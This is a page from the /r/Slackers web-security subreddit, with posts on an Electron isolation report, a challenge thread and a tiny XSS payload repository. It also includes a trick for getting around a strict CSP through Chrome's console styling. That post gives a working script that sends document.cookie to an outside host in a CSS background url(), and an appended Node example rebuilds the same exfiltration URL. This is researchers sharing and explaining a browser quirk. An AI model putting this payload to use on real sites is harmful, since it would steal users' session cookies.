/r/Slackers
As the report is finally public, you can read about the discoveries, which led to the Electron Framework adding the ContextIsolation option.
All the credits belong to masato :)
https://drive.google.com/file/d/1LSsD9gzOejmQ2QipReyMXwr_M0Mg1GMH/view
Grrrr, reddit archives posts after 6 months (even if sticky), so here is a new challenge thread. To post a challenge, please follow the following format:
Creator:
Challenge:
Solution:
Rules:
The old challenge thread is available here:
https://www.reddit.com/r/Slackers/comments/ebcg8z/the_challenge_thread/
Recently I created a repo to collect all cool, but tiny, XSS payloads that I knew of.
https://github.com/terjanq/Tiny-XSS-Payloads
Please contribute if you know of any other cool tricks you can do, or if you know about authors of payloads already included there https://github.com/terjanq/Tiny-XSS-Payloads/blob/master/payloads.js
While trying weird stuff on the sandbox made by /u/garethheyes/ I found a way to bypass img-src when the console is open.
In Chrome you can add CSS styles to your console output, and the console supports background-image.
So you can use this feature to exfiltrate some data with a strict CSP.
<script>
// Closing quote and parenthesis of url() were missing in the original; bi.tk is the poster's collector host.
console.log("%cHello", `background: url("//bi.tk/${document.cookie}")`)
</script>
But this only triggers when the console is open.
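As an added example (not code from the post above or from the sandbox author), the following Node script models how the console splits a format string on %c directives, so the exfiltration payload can be reasoned about offline: each %c consumes the next argument as the CSS for the text after it, and a url() inside that CSS is what DevTools fetches when it renders the line. The collector host and the cookie value are constructed placeholders, and the real request only fires in Chrome with the console open; this script just shows which segment carries the style and which URL it would load.

```javascript
// Added example, not code from the original post. Emulates the console's "%c"
// handling so the trick can be inspected in Node; real rendering (and the
// resulting image request) only happens in Chrome DevTools when open.

// Split a console.log format string into styled segments. Each %c consumes the
// next argument as the CSS for the text that follows it; %s/%d/%i/%f/%o/%O
// consume the next argument as substituted text; %% is a literal percent.
function parseConsoleFormat(fmt, ...args) {
  const segments = [];
  let style = "";
  let text = "";
  let argIdx = 0;
  const flush = () => {
    if (text.length > 0) segments.push({ text, style });
    text = "";
  };
  for (let i = 0; i < fmt.length; i++) {
    const ch = fmt[i];
    const spec = fmt[i + 1];
    if (ch !== "%" || spec === undefined) { text += ch; continue; }
    if (spec === "%") { text += "%"; i++; continue; }
    if (spec === "c") {
      flush();                                   // previous style ends here
      style = argIdx < args.length ? String(args[argIdx++]) : "";
      i++;
      continue;
    }
    if ("sdifoO".includes(spec)) {
      text += argIdx < args.length ? String(args[argIdx++]) : "%" + spec;
      i++;
      continue;
    }
    text += ch;                                  // unknown directive stays literal
  }
  flush();
  return segments;
}

// Build the style argument used in the trick: a background image pointing at a
// collector host (assumed placeholder) with the data in the path.
// encodeURIComponent keeps cookie characters such as ';', '"' and ' ' from
// breaking the url() token, which is the usual reason a raw cookie fails to load.
function buildExfilStyle(collector, data) {
  return `background: url("${collector}/${encodeURIComponent(data)}")`;
}

// Pull every url() target out of the segments' styles, i.e. the requests that
// DevTools would issue when rendering the styled line.
function exfilTargets(segments) {
  const urls = [];
  const re = /url\(\s*["']?([^"')]+)["']?\s*\)/g;
  for (const seg of segments) {
    let m;
    while ((m = re.exec(seg.style)) !== null) urls.push(m[1]);
  }
  return urls;
}

// Constructed sample data: not a real session, not a real collector.
const SAMPLE_COOKIE = "session=abc123; theme=dark";
const COLLECTOR = "//collector.example";

function demo() {
  const style = buildExfilStyle(COLLECTOR, SAMPLE_COOKIE);
  const segments = parseConsoleFormat("%cHello %s", style, "world");
  return { segments, targets: exfilTargets(segments) };
}

console.log(JSON.stringify(demo(), null, 2));
```

Note the check this makes explicit: a CSP `img-src` directive restricts images the page loads, but the styled console line is rendered by DevTools, so the usual defence of a strict CSP does not stop this channel; the limiting factor is only that the console has to be open.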